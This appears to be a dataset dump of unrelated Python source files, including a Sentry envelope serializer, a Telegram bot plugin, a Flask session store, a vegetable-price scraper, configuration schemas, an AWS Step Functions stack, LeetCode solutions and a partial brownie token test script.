return cls.deserialize_from(io.BytesIO(bytes))
def __repr__(self):
return "<Envelope headers=%r items=%r>" % (self.headers, self.items,)
class PayloadRef(object):
def __init__(self, bytes=None, path=None, event=None):
self.bytes = bytes
self.path = path
self.event = event
def get_bytes(self):
if self.bytes is None:
if self.path is not None:
with open(self.path, "rb") as f:
self.bytes = f.read()
elif self.event is not None:
self.bytes = json.dumps(self.event).encode("utf-8")
else:
self.bytes = b""
return self.bytes
def prepare_serialize(self):
if self.path is not None and self.bytes is None:
f = open(self.path, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
def writer(out):
try:
shutil.copyfileobj(f, out)
finally:
f.close()
return length, writer
bytes = self.get_bytes()
return len(bytes), lambda f: f.write(bytes)
@property
def _type(self):
if self.event is not None:
return "event"
elif self.bytes is not None:
return "bytes"
elif self.path is not None:
return "path"
return "empty"
def __repr__(self):
return "<Payload %r>" % (self._type,)
class Item(object):
def __init__(self, payload, headers=None):
if headers is not None:
headers = dict(headers)
else:
headers = {}
self.headers = headers
if isinstance(payload, bytes):
payload = PayloadRef(bytes=payload)
elif isinstance(payload, text_type):
payload = PayloadRef(bytes=payload.encode("utf-8"))
elif isinstance(payload, dict):
payload = PayloadRef(event=payload)
if "content_type" not in headers:
if payload.event is not None:
headers["content_type"] = "application/json"
else:
headers["content_type"] = "application/octet-stream"
if "type" not in headers:
if payload.event is not None:
headers["type"] = "event"
else:
headers["type"] = "attachment"
self.payload = payload
def __repr__(self):
return "<Item headers=%r payload=%r>" % (self.headers, self.payload,)
def get_bytes(self):
return self.payload.get_bytes()
def get_event(self):
if self.payload.event is not None:
return self.payload.event
def serialize_into(self, f):
headers = dict(self.headers)
length, writer = self.payload.prepare_serialize()
headers["length"] = length
f.write(json.dumps(headers).encode("utf-8"))
f.write(b"\n")
writer(f)
f.write(b"\n")
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
line = f.readline().rstrip()
if not line:
return
headers = json.loads(line)
length = headers["length"]
payload = f.read(length)
if headers.get("type") == "event":
rv = cls(headers=headers, payload=PayloadRef(event=json.loads(payload)))
else:
rv = cls(headers=headers, payload=payload)
f.readline()
return rv
@classmethod
def deserialize(cls, bytes):
return cls.deserialize_from(io.BytesIO(bytes)) | py/sentry_relay/envelope.py | 0.370795 | 0.085633 |
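A quick round-trip sketch using the Envelope and Item classes above; a dict payload is wrapped as an event item automatically:

envelope = Envelope(headers={"event_id": "abc123"})
envelope.add_item(Item(payload={"message": "hello"}))  # dict -> PayloadRef(event=...)

raw = envelope.serialize()           # headers line, then one headers+payload pair per item
restored = Envelope.deserialize(raw)
assert restored.headers == {"event_id": "abc123"}
assert restored.get_event() == {"message": "hello"}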
from __future__ import print_function
import telegram
from telegram.ext import MessageHandler, Filters
from textblob import TextBlob
from myTelegramBot.PluginSystem import BasePlugin
from myTelegramBot.libs.gcal import GoogleCalendar
import datetime
class HelloFilter(Filters):
def __init__(self):
super(HelloFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'ciao' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class EventsFilter(Filters):
def __init__(self):
super(EventsFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'eventi' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class RacPlugin(BasePlugin):
def __init__(self, *args, **kwargs):
super(RacPlugin, self).__init__(*args, **kwargs)
@staticmethod
def hello(bot, update):
"""
Method which answers a hello message
:param bot:
:type bot:
:param update:
:type update:
"""
chat_id = update.message.chat_id
user = update.message.from_user
bot.sendMessage(chat_id, "Ciao: {}!".format(user.first_name))
@staticmethod
def show_events(bot, update, user_data):
chat_id = update.message.chat_id
user = update.message.from_user
cal_manager = GoogleCalendar()
events = cal_manager.get_events()
bot.sendMessage(chat_id, "Certo {}, ecco i prossimi 10 eventi secondo il calendario:".format(user.first_name))
msg = str()
for event in events:
try:
start_time = datetime.datetime.strptime(event['start'].get('dateTime').split('+')[0],
'%Y-%m-%dT%H:%M:%S').__str__()
except AttributeError:
start_time = datetime.datetime.strptime(event['start'].get('date'), '%Y-%m-%d')
if 'location' in event.keys():
location = event['location']
else:
location = 'Mi dispiace, qualche pigro non ha inserito la location.'
msg += "{} : {}. Luogo: {}\n\n".format(start_time, event['summary'], location)
bot.sendMessage(chat_id, text=msg, parse_mode=telegram.ParseMode.MARKDOWN)
def setup(self):
self.dispatcher.add_handler(
MessageHandler([HelloFilter.text], self.hello, pass_user_data=False)
)
self.dispatcher.add_handler(
MessageHandler([EventsFilter.text], self.show_events, pass_user_data=True)
)
def initialize(*args, **kwargs):
return RacPlugin(*args, **kwargs) | myTelegramBot/modules/rac_plugin.py | 0.501221 | 0.078819 |
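The filters above match on lowercased TextBlob tokens; a small check of that matching logic in isolation (TextBlob's tokenizer needs the NLTK punkt data to be installed):

from textblob import TextBlob

blob = TextBlob("Ciao RacBot!")
tokens = blob.tokens.lower()                     # ['ciao', 'racbot', '!']
print('ciao' in tokens and 'racbot' in tokens)   # True -> HelloFilter.text would match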
from json import loads, dumps
from uuid import uuid4
from datetime import datetime, timedelta
from flask.sessions import SessionInterface, SessionMixin
from flask_login import _create_identifier
from dataactcore.interfaces.db import GlobalDB
from dataactcore.models.userModel import SessionMap
class LoginSession:
"""
This class is a wrapper for the session object
"""
@staticmethod
def logout(session):
"""
arguments:
session -- (Session) the session object
Clears the current session
"""
session.pop("login", None)
session.pop("name", None)
@staticmethod
def login(session, username):
"""
arguments:
session -- (Session) the session object
username -- (int) the id of the user
Sets the current session status
"""
session["name"] = username
session["login"] = True
@staticmethod
def reset_id(session):
"""
arguments:
session -- (Session) the session object
resets the _uid in cases that the session becomes invalid
"""
session["_uid"] = "{}|{}".format(_create_identifier(), uuid4())
def to_unix_time(datetime_value):
"""
arguments:
datetime_value -- (DateTime)
Converts datetime_value to time in seconds since 1970
returns int
"""
if isinstance(datetime_value, datetime):
# If argument is a datetime object, convert to timestamp
return (datetime_value - datetime(1970, 1, 1)).total_seconds()
return datetime_value
class UserSession(dict, SessionMixin):
"""
Class that wraps around normal Flask Session object
"""
pass
class UserSessionInterface(SessionInterface):
"""
Class That implements the SessionInterface and uses SessionTable to store data
"""
SESSION_CLEAR_COUNT_LIMIT = 10
CountLimit = 1
def __init__(self):
return
def open_session(self, app, request):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
implements the open_session method that pulls or creates a new UserSession object
"""
sid = request.headers.get("x-session-id")
if sid and SessionTable.does_session_exist(sid):
if SessionTable.get_timeout(sid) > to_unix_time(datetime.utcnow()):
session_dict = UserSession()
# Read data as json
data = loads(SessionTable.get_data(sid))
for key in data.keys():
session_dict[key] = data[key]
return session_dict
# This can be made better most likely need to do research
# Maybe Hash(time + server id + random number)? Want to prevent any conflicts
sid = str(uuid4())
session_dict = UserSession()
session_dict["sid"] = sid
return session_dict
def save_session(self, app, session, response):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
session -- (Session) the session object
implements the save_session method that saves the session or clears it
based on the timeout limit, this function also extends the expiration time of the current session
"""
if not session:
return
# Extend the expiration based on either the time out limit set here or
# the permanent_session_lifetime property of the app
if self.get_expiration_time(app, session):
expiration = self.get_expiration_time(app, session)
else:
if "session_check" in session and session["session_check"] and \
SessionTable.does_session_exist(session["sid"]):
# This is just a session check, don't extend expiration time
expiration = SessionTable.get_timeout(session["sid"])
# Make sure next route call does not get counted as session check
session["session_check"] = False
else:
expiration = datetime.utcnow() + timedelta(seconds=SessionTable.TIME_OUT_LIMIT)
if "_uid" not in session:
LoginSession.reset_id(session)
SessionTable.new_session(session["sid"], session, expiration)
UserSessionInterface.CountLimit += 1
if UserSessionInterface.CountLimit % UserSessionInterface.SESSION_CLEAR_COUNT_LIMIT == 0:
SessionTable.clear_sessions()
UserSessionInterface.CountLimit = 1
# Return session ID as header x-session-id
response.headers["x-session-id"] = session["sid"]
class SessionTable:
"""
Provides helper functions for session management
Constants :
TIME_OUT_LIMIT -- (int) The limit used for the session
"""
TIME_OUT_LIMIT = 604800
@staticmethod
def clear_sessions():
"""
Removes old sessions that are expired
"""
new_time = to_unix_time(datetime.utcnow())
sess = GlobalDB.db().session
sess.query(SessionMap).filter(SessionMap.expiration < new_time).delete()
sess.commit()
@staticmethod
def does_session_exist(uid):
"""
arguments:
uid -- (String) the uid
return (boolean) whether the session exists
"""
item = GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one_or_none()
if item is not None:
# session found
return True
else:
return False
@staticmethod
def get_timeout(uid):
"""
arguments:
uid -- (String) the uid
return (int) time when the session expires
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().expiration
@staticmethod
def get_data(uid):
"""
uid -- (String) the uid
return (Session) the session data
"""
return GlobalDB.db().session.query(SessionMap).filter_by(uid=uid).one().data
@staticmethod
def new_session(uid, data, expiration):
""" Updates current session or creates a new one if no session exists
arguments:
uid -- (String) the session id
data -- (String) the data for the session
expiration -- (int) the time in seconds from 1970 when the session is no longer active
Updates the existing session or creates a new one
"""
# Try converting session to json
sess = GlobalDB.db().session
user_session = sess.query(SessionMap).filter_by(uid=uid).one_or_none()
if user_session is None:
# No existing session found, create a new one
new_session = SessionMap(uid=uid, data=dumps(data), expiration=to_unix_time(expiration))
sess.add(new_session)
else:
# Modify existing session
user_session.data = dumps(data)
user_session.expiration = to_unix_time(expiration)
sess.commit() | dataactbroker/handlers/aws/session.py | 0.629433 | 0.231669 |
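Wiring this interface into a Flask app uses the standard session_interface hook; a minimal sketch, assuming GlobalDB has already been initialized so SessionTable can reach the database:

from flask import Flask

app = Flask(__name__)
app.session_interface = UserSessionInterface()  # sessions now persist via SessionTable

@app.route("/")
def index():
    return "ok"  # responses will carry the x-session-id header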
import requests, re
import csv
from datetime import timedelta, date
import datetime
import os.path
from collections import deque
from average import average
from typhoon import typhoon
from merge import merge
from transToJson import transToJson
import VG
dir = os.path.dirname(os.path.abspath(__file__))
oneday = timedelta(days=1)
default_start_date = VG.default_start_date
end_date = date.today()
#date control--------------------------------------------------------------------
def string_month_day_transer(input_month_day):
if(input_month_day < 10):
return '0'+str(input_month_day)
else:
return str(input_month_day)
def string_transto_ROCyear(input_year):
return str(input_year-1911)
#--------------------------------------------------------------------------------
def get_oneday(vegetable_code:str, upload_date:datetime.date):
oneday_dict = dict()
payload = {
'mhidden1':'false',
'myy':string_transto_ROCyear(upload_date.year),
'mmm':string_month_day_transer(upload_date.month),
'mdd':string_month_day_transer(upload_date.day),
'mpno':vegetable_code
}
res = requests.post("http://amis.afa.gov.tw/v-asp/v101r.asp", data = payload)
res.encoding = 'big5'
vg_weight_re = re.search('<font color="#0000FF">([0-9]*\.?[0-9]*)</font>公斤</strong></td>', res.text)
vg_price_re = re.search('<font color="#0000FF">([0-9]*\.[0-9]*)</font>元/公斤</strong></td>', res.text)
if(vg_weight_re and vg_price_re):
vg_weight = float(vg_weight_re.group(1))
vg_price = float(vg_price_re.group(1))
oneday_dict = {
'year':upload_date.year,
'month':upload_date.month,
'day':upload_date.day,
'weight':vg_weight,
'price':vg_price
}
else:
#missing data: fall back to the previous day's figures
oneday_dict = get_oneday(vegetable_code, upload_date - oneday)
#but keep the requested date on the record
oneday_dict['year'] = upload_date.year
oneday_dict['month'] = upload_date.month
oneday_dict['day'] = upload_date.day
return oneday_dict
#--------------------------------------------------------------------------------
def vg_csv_file(vagetable:str):
return dir + '/vagetable/' +vagetable+'.csv'
#--------------------------------------------------------------------------------
def least_day(csvfile):
least_row = deque(csv.reader(csvfile), 1)[0]
date = datetime.date(int(least_row[0]), int(least_row[1]), int(least_row[2]))
print('\tleast date->',date)
return date
#--------------------------------------------------------------------------------
if __name__ == '__main__':
for vagetable in VG.VG_LIST:
print(vagetable)
#exist item
if(os.path.isfile(vg_csv_file(vagetable)) ):
print('\tfind '+vg_csv_file(vagetable))
#find which day to start
csvfile_read = open(vg_csv_file(vagetable), 'r', newline='')
date = least_day(csvfile_read) + oneday
#append data
csvfile_write = open(vg_csv_file(vagetable), 'a', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile_write, fieldnames=fieldnames)
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile_read.close()
csvfile_write.close()
#new item
else:
print('\t'+vg_csv_file(vagetable)+' does not exist')
print('\tcreate '+vg_csv_file(vagetable))
csvfile = open(vg_csv_file(vagetable), 'w', newline='')
fieldnames = ['year', 'month', 'day', 'weight', 'price']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
#parse from default_start_date
date = default_start_date
while(date != end_date):
data = get_oneday(vagetable, date)
print('\t',data)
#one day
writer.writerow({'year':data['year'],
'month':data['month'],
'day':data['day'],
'weight':data['weight'],
'price':data['price']})
date += oneday
csvfile.close()
average()
typhoon()
merge()
transToJson() | vegetable-price/python/parser/parser.py | 0.12412 | 0.065068 |
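Quick sanity checks for the date helpers above (they are pure functions, so they can be exercised without hitting the AMIS endpoint):

assert string_month_day_transer(3) == '03'    # zero-pads single digits
assert string_month_day_transer(12) == '12'
assert string_transto_ROCyear(2024) == '113'  # Gregorian year -> Republic of China year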
from .sbaas_base import sbaas_base
from .sbaas_base_query_insert import sbaas_base_query_insert
from .sbaas_base_query_update import sbaas_base_query_update
from .sbaas_base_query_delete import sbaas_base_query_delete
# resources
from io_utilities.base_importData import base_importData
class sbaas_base_i(sbaas_base
):
def import_rows_sqlalchemyModel_add_csv(self,model_I,filename_I):
'''Add rows to model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_update_csv(self,model_I,filename_I):
'''update rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_reset_csv(self,model_I,filename_I):
'''reset rows of model_I from filename_I
INPUT:
model_I = sqlalchemy model object
filename_I = .csv file name/location
'''
data = base_importData();
data.read_csv(filename_I);
data.format_data();
querydelete = sbaas_base_query_delete(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
querydelete.reset_rows_sqlalchemyModel_primaryKeys(model_I,data.data);
data.clear_data();
def import_rows_sqlalchemyModel_add_listDict(self,model_I,listDict_I):
'''Add rows to model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryinsert = sbaas_base_query_insert(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryinsert.add_rows_sqlalchemyModel(model_I,listDict_I);
def import_rows_sqlalchemyModel_update_listDict(self,model_I,listDict_I):
'''update rows of model_I from listDict_I
INPUT:
model_I = sqlalchemy model object
listDict_I = [{}]
'''
queryupdate = sbaas_base_query_update(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
queryupdate.update_rows_sqlalchemyModel_primaryKeys(model_I,listDict_I); | SBaaS_base/sbaas_base_i.py | 0.290981 | 0.041598 |
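A hypothetical usage sketch for the CSV importers above; `MyModel`, the file path, and the session/engine/settings wiring are all assumptions, since the sbaas_base constructor is not shown here:

loader = sbaas_base_i(session_I=session, engine_I=engine,
                      settings_I=settings, data_I=None)  # hypothetical wiring
loader.import_rows_sqlalchemyModel_add_csv(MyModel, 'data/my_rows.csv')     # insert rows
loader.import_rows_sqlalchemyModel_update_csv(MyModel, 'data/my_rows.csv')  # update by primary keys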
import argparse
parser = argparse.ArgumentParser(description="CoViAR")
# Data.
parser.add_argument('--data-name', type=str,
help='dataset name.') #choices=['ucf101', 'hmdb51']
parser.add_argument('--data-root', type=str,
help='root of data directory.')
parser.add_argument('--train-list', type=str,
help='training example list.')
parser.add_argument('--test-list', type=str,
help='testing example list.')
# Model.
parser.add_argument('--arch', type=str, default="resnet152",
help='base architecture.')
parser.add_argument('--num_segments', type=int, default=3,
help='number of TSN segments.')
parser.add_argument('--no-accumulation', action='store_true',
help='disable accumulation of motion vectors and residuals.')
parser.add_argument('--dropout', default=0.5, type=float,
help='dropout.')
parser.add_argument('--is_shift', action='store_true',
help='enable TSM')
# Training.
parser.add_argument('--is_train', action='store_true',
help='training flag.')
parser.add_argument('--epochs', default=500, type=int,
help='number of training epochs.')
parser.add_argument('--batch-size', default=40, type=int,
help='batch size.')
parser.add_argument('--lr', default=0.001, type=float,
help='base learning rate.')
parser.add_argument('--lr-steps', default=[200, 300, 400], type=float, nargs="+",
help='epochs to decay learning rate.')
parser.add_argument('--lr-decay', default=0.1, type=float,
help='lr decay factor.')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
help='weight decay.')
parser.add_argument('--clip_gradient', '--gd', type=int, default=20, help='gradient clip')
parser.add_argument("--local_rank", type=int,
help='local rank for DistributedDataParallel')
# Log.
parser.add_argument('--eval-freq', default=5, type=int,
help='evaluation frequency (epochs).')
parser.add_argument('--workers', default=20, type=int,
help='number of data loader workers.')
parser.add_argument('--model-prefix', type=str, default="model",
help="prefix of model name.")
parser.add_argument('--gpus', type=str, default='2',
help='gpu ids.') | train_options.py | 0.593609 | 0.072735 |
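Parsing a minimal command line with the parser above (paths and list files are placeholders):

args = parser.parse_args([
    '--data-name', 'ucf101',
    '--data-root', '/data/ucf101',
    '--train-list', 'train.txt',
    '--test-list', 'test.txt',
    '--is_train',
])
print(args.arch, args.lr, args.is_train)  # resnet152 0.001 True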
from schema import Schema, And, Or, Use
import yaml
from pathlib import Path
from io import StringIO
DEFAULT_CONFIG = """\
runtime:
cores_per_node: 1 # Number of cores per node (positive integer)
batch_size: 1 # Size of batches (positive integer)
raven:
annotations: false # Look for Raven annotations (boolean)
label_corrections: null # Use this file to correct classes in Raven annotations (null or string)
audio:
sample_rate: 22050 # Sample rate for audio resampling (null or positive integer)
max_duration: null # Maximum duration of audio file during read (null or positive integer)
resample_type: "kaiser_best" # Resample type for librosa ("kaiser_best" or "kaiser_fast")
split_and_save:
clip_duration: 5 # The duration of the output segments
clip_overlap: 1 # The overlap of adjacent segments
final_clip: null # How to treat the final clip (null, "remainder", "full", "extend")
dry_run: false # Write the segments CSV but don't write the audio segments (boolean)
""".strip()
greater_than_zero = lambda n: n > 0
greater_than_or_equal_zero = lambda n: n >= 0
AUDIO_SCHEMA = Schema(
{
"sample_rate": Or(
None,
And(
Use(int),
greater_than_zero,
error="Sample rate should be null or a positive integer",
),
),
"max_duration": Or(
None,
And(
Use(int),
greater_than_zero,
error="Max duration should be a positive integer or null",
),
),
"resample_type": And(
Use(str),
lambda s: s in ["kaiser_best", "kaiser_fast"],
error="Resample type can be one of kaiser_fast or kaiser_best",
),
}
)
RUNTIME_SCHEMA = Schema(
{
"cores_per_node": And(Use(int), greater_than_zero),
"batch_size": And(Use(int), greater_than_zero),
}
)
RAVEN_SCHEMA = Schema(
{
"annotations": Use(
bool, error="Annotations should be a boolean value, e.g. `true` or `false`"
),
"label_corrections": Or(
None,
And(
Use(str),
lambda fname: Path(fname).exists() and Path(fname).is_file(),
error="Label corrections should be a file that exists",
),
),
}
)
SPLIT_AND_SAVE_SCHEMA = Schema(
{
"clip_duration": And(Use(int), greater_than_zero),
"clip_overlap": And(Use(int), greater_than_or_equal_zero),
"final_clip": Or(
None,
And(
Use(str),
lambda s: s in ["remainder", "full", "extend"],
error="Final clip can be one of `remainder`, `full`, `extend`",
),
),
"dry_run": Use(
bool, error="dry_run should be a boolean value, e.g. `true` or `false`"
),
}
)
SCHEMA = Schema(
{
"audio": AUDIO_SCHEMA,
"runtime": RUNTIME_SCHEMA,
"raven": RAVEN_SCHEMA,
"split_and_save": SPLIT_AND_SAVE_SCHEMA,
}
)
def validate(config):
""" Validate a configuration string
Input:
config: A string containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with StringIO(config) as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def validate_file(fname):
""" Validate a configuration file
Input:
fname: A filename containing an Opensoundscape configuration
Output:
dict: A dictionary of the validated Opensoundscape configuration
"""
with open(fname, "r") as f:
yml = yaml.load(f, Loader=yaml.SafeLoader)
return SCHEMA.validate(yml)
def get_default_config():
""" Get the default configuration file as a dictionary
Output:
dict: A dictionary containing the default Opensoundscape configuration
"""
return validate(DEFAULT_CONFIG) | opensoundscape/config.py | 0.817064 | 0.335609 |
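The default configuration validates against the schema as-is, so it doubles as a usage example:

cfg = get_default_config()
assert cfg["audio"]["sample_rate"] == 22050
assert cfg["split_and_save"]["final_clip"] is None
assert cfg["raven"]["annotations"] is False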
from aws_cdk import (
aws_stepfunctions as sfn,
aws_stepfunctions_tasks as sfn_tasks,
core,
)
class JobPollerStack(core.Stack):
def __init__(self, app: core.App, id: str, **kwargs) -> None:
super().__init__(app, id, **kwargs)
submit_job_activity = sfn.Activity(
self, "SubmitJob"
)
check_job_activity = sfn.Activity(
self, "CheckJob"
)
do_mapping_activity1 = sfn.Activity(
self, "MapJob1"
)
do_mapping_activity2 = sfn.Activity(
self, "MapJob2"
)
submit_job = sfn.Task(
self, "Submit Job",
task=sfn_tasks.InvokeActivity(submit_job_activity),
result_path="$.guid",
)
task1 = sfn.Task(
self, "Task 1 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity1),
result_path="$.guid",
)
task2 = sfn.Task(
self, "Task 2 in Mapping",
task=sfn_tasks.InvokeActivity(do_mapping_activity2),
result_path="$.guid",
)
wait_x = sfn.Wait(
self, "Wait X Seconds",
time=sfn.WaitTime.seconds_path('$.wait_time'),
)
get_status = sfn.Task(
self, "Get Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
result_path="$.status",
)
is_complete = sfn.Choice(
self, "Job Complete?"
)
job_failed = sfn.Fail(
self, "Job Failed",
cause="AWS Batch Job Failed",
error="DescribeJob returned FAILED"
)
final_status = sfn.Task(
self, "Get Final Job Status",
task=sfn_tasks.InvokeActivity(check_job_activity),
input_path="$.guid",
)
definition_map = task1.next(task2)
process_map = sfn.Map(
self, "Process_map",
max_concurrency=10
).iterator(definition_map)
definition = submit_job \
.next(process_map) \
.next(wait_x) \
.next(get_status) \
.next(is_complete
.when(sfn.Condition.string_equals(
"$.status", "FAILED"), job_failed)
.when(sfn.Condition.string_equals(
"$.status", "SUCCEEDED"), final_status)
.otherwise(wait_x))
sfn.StateMachine(
self, "StateMachine",
definition=definition,
timeout=core.Duration.seconds(30),
) | python/stepfunctions/stepfunctions/stepfunctions_stack.py | 0.66072 | 0.152568 |
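Synthesizing the stack follows the usual CDK v1 entry-point pattern; a minimal sketch of what an app.py would contain (stack id is a placeholder):

app = core.App()
JobPollerStack(app, "job-poller-stack")  # hypothetical stack id
app.synth()                              # emits the CloudFormation template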
# V1
# https://leetcode.com/problems/peeking-iterator/discuss/123811/Python-solution
class PeekingIterator(object):
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.next_val = None
self.iterator = iterator
if self.iterator.hasNext():
self.next_val = iterator.next()
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
return self.next_val
def next(self):
"""
:rtype: int
"""
cur_val = self.next_val
if self.iterator.hasNext():
self.next_val = self.iterator.next()
else:
self.next_val = None
return cur_val
def hasNext(self):
"""
:rtype: bool
"""
return self.next_val is not None
# V1'
# https://leetcode.com/problems/peeking-iterator/discuss/72626/Simple-Python-Solution
class PeekingIterator(object):
def __init__(self, iterator):
self.iter = iterator
self.temp = self.iter.next() if self.iter.hasNext() else None
def peek(self):
return self.temp
def next(self):
ret = self.temp
self.temp = self.iter.next() if self.iter.hasNext() else None
return ret
def hasNext(self):
return self.temp is not None
# V1''
# https://leetcode.com/problems/peeking-iterator/discuss/729795/Python-Solution
class PeekingIterator:
def __init__(self, iterator):
"""
Initialize your data structure here.
:type iterator: Iterator
"""
self.iter = iterator
self.cache = None
def peek(self):
"""
Returns the next element in the iteration without advancing the iterator.
:rtype: int
"""
if self.cache is None:
self.cache = self.iter.next()
return self.cache
def next(self):
"""
:rtype: int
"""
if self.cache is not None:
temp = self.cache
self.cache = None
return temp
return self.iter.next()
def hasNext(self):
"""
:rtype: bool
"""
return self.cache is not None or self.iter.hasNext()
# V2 | leetcode_python/Design/peeking-iterator.py | 0.88894 | 0.142769 |
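LeetCode supplies the Iterator class at judge time; a minimal stand-in makes the solutions testable locally (this exercises the last PeekingIterator defined above):

class Iterator(object):
    """Minimal stand-in for LeetCode's Iterator."""
    def __init__(self, nums):
        self._nums = list(nums)
        self._i = 0
    def hasNext(self):
        return self._i < len(self._nums)
    def next(self):
        val = self._nums[self._i]
        self._i += 1
        return val

it = PeekingIterator(Iterator([1, 2, 3]))
assert it.peek() == 1  # look ahead without consuming
assert it.next() == 1
assert it.next() == 2
assert it.hasNext()
assert it.next() == 3
assert not it.hasNext()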
import numpy as np
__all__ = [
'distance', 'is_close', 'is_same', 'normalize'
]
def distance(p1, p2):
"""
Return the euclidean distance between the two points
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
"""
squared_dist = (p2 - p1)**2
sum_squared = np.sum(squared_dist)
return np.sqrt(sum_squared)
def is_close(p1, p2, limit=1e-3):
"""
Return True if p1 and p2 are closer than the defined limit (default 1e-3)
according to euclidean distance, False otherwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
limit : float (optional)
The maximum distance p1 is allowed to be away from p2
returns
-------
bool
Whether the two points are close
"""
return distance(p1, p2) <= limit
def is_same(p1, p2):
"""
Return True if p1 and p2 are at the same position according to Euclidean distance, False otherwise
parameters
----------
p1 : numpy array
N-array describing the position of p1
p2 : numpy array
N-array describing the position of p2
returns
-------
bool
Whether the two points are at the same position
"""
return is_close(p1, p2, limit=0)
def normalize(vec):
"""
Normalize the given vector
parameters
----------
vec : numpy array
Vector to be normalized
"""
return vec/np.linalg.norm(vec)
def bezier_curve(t, points):
"""
Returns the point on the bezier curve defined by the given points and parameterized between [0,1]
#TODO Might only work in 1D
parameters
---------
t : float
The evaluation parameter, a real number in [0, 1] where 0 is the start of the curve and 1 is the end
points: numpy array of the points
Control points that define the bezier curve
"""
if len(points) == 1:
return points[0]
return bezier_curve(t, points[:-1]) * (1 - t) + bezier_curve(t, points[1:]) * t | alloy/math/basic.py | 0.872102 | 0.816113 |
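# --- Usage sketch for the module above (added for illustration); assumes it
# is importable as alloy.math.basic, per the repo path.
import numpy as np
from alloy.math.basic import bezier_curve, distance, is_close, is_same, normalize

p1 = np.array([0.0, 0.0])
p2 = np.array([3.0, 4.0])
print(distance(p1, p2))   # 5.0
print(is_close(p1, p2))   # False, since 5.0 > 1e-3
print(is_same(p1, p1))    # True
print(normalize(p2))      # [0.6 0.8]
# bezier_curve implements the recursive definition
# B(t) = (1 - t) * B_front(t) + t * B_back(t) (de Casteljau style); with 1-D
# control points [0.0, 1.0] it reduces to linear interpolation:
print(bezier_curve(0.5, np.array([0.0, 1.0])))  # 0.5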
print(" -- Script start -- ")
from brownie import accounts
from .pcat import PCat
# Account names are not important, but they must be unique.
me = accounts[0]
# MT
rudeus_greyart = accounts[1]
eris_whats_her_face = accounts[2]
# TSCOG
seol_jihu = accounts[3]
yeo_soohi = accounts[4]
# TBATE
arthur_lewyin = accounts[5]
tessia_earlith = accounts[6]
caera_whats_her_face = accounts[7]
# WB
jay = accounts[8]
shelly = accounts[9]
# Deploy contract
pussy_cat = PCat(me)
def main():
print(" -- Main start -- ")
# Check the token data
print(pussy_cat.name())
print(pussy_cat.symbol())
print(pussy_cat.decimals())
print(pussy_cat.total_supply())
# transfer_tests()
# mint_tests()
# burn_tests()
pause_tests()
# role_tests()
# owner_tests()
print(" -- Main end -- ")
def transfer_tests():
print(" -- Transfer start -- ")
# Try a normal transfer
pussy_cat.transfer(rudeus_greyart, 100)
# Try to transfer without balance
try:
pussy_cat.transfer(rudeus_greyart, 100, eris_whats_her_face)
print("Nope")
except:
print("Success")
pussy_cat.transfer(rudeus_greyart, 100, me)
# Transfer from rudeus
pussy_cat.transfer(eris_whats_her_face, 100, rudeus_greyart)
# Transfer from rudeus to himself
pussy_cat.transfer(rudeus_greyart, 10, rudeus_greyart)
pretty_print_balance(rudeus_greyart)
pretty_print_balance(me)
pretty_print_balance(eris_whats_her_face)
print(" -- Transfer end -- \n")
def mint_tests():
print(" -- Mint start -- ")
# Send some tokens to TSCOG characters
pussy_cat.transfer(seol_jihu, 100)
pussy_cat.transfer(yeo_soohi, 100)
pretty_print_balance(me)
# Add some tokens to me
pussy_cat.mint(me, 400)
pretty_print_balance(me)
print(f"Total supply: {pussy_cat.total_supply()}")
# Try and mint as a non roler
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
# Make yeo_soohi a roler
pussy_cat.add_role(yeo_soohi, 3)
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Mint end -- \n")
def burn_tests():
print(" -- Burn start -- ")
# Send some tokens to TBATE characters
